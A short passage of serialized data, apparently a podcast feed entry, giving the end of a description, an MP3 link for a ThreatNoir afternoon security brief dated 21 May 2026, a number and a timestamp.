threats.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-21\u002Fthreatnoir-afternoon-brief-2026-05-21.mp3",124,"2026-05-21T13:16:43.01282+00:00"]